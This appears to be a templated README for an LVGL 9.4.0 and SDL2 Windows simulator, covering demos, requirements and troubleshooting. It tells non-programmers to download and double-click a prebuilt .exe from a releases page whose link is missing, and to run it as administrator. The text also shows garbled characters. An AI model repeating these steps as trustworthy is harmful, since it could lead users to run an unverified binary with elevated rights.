The lvgl9-sdl2-windows-simulator is a reference project designed for Windows users looking to explore LVGL 9.4.0 and SDL2. This simulator provides a straightforward way to test various demo widgets, listen to music, and run benchmarks and keypad demos. It does not support LVGL 8.x versions.
You can easily run the simulator by following these steps. No programming knowledge is necessary.
To begin, visit the download page to get the latest version of the software.
Click the link below to access the releases page:
On the releases page, look for the latest version. It should be at the top of the list.
Once you find the latest version, you will see a list of files. Click on the .exe file that matches your system.
After the download completes, locate the file on your computer (usually in the "Downloads" folder). Double-click the .exe file to run the simulator.
Once the simulator is running, you can start exploring the demo widgets. Try out the music and benchmark demos to see how LVGL 9.4.0 works.
- Operating System: Windows 10 or later
- RAM: Minimum 4 GB
- Storage: 100 MB of available disk space
- Processor: Intel or AMD, 1.5 GHz or faster
- Fully working demo widgets to showcase the power of LVGL 9.4.0
- Music playback capabilities
- Benchmark functionalities to test performance
- Keypad demos to illustrate input handling
- No dependencies โ just install and run
If you encounter issues while running the simulator, consider these solutions:
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Check System Requirements: Ensure your computer meets the system requirements above.
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Re-download the Installer: If the installation fails, try downloading the
.exefile again from the releases page. -
Run as Administrator: Right-click on the
.exefile and select โRun as administratorโ if you face permission issues. -
Check for Updates: Make sure you are using the latest version of the simulator for optimal performance.
While this project is designed for end users, contributions are welcome. If you want to help improve the project, please visit our GitHub page. You can report issues or suggest features.
This simulator is open-source. You can use it freely but please adhere to the license terms provided in the repository.
For support, please refer to the issues section on GitHub. You can post any questions or concerns there.
Remember, you can always download the latest version from our releases page.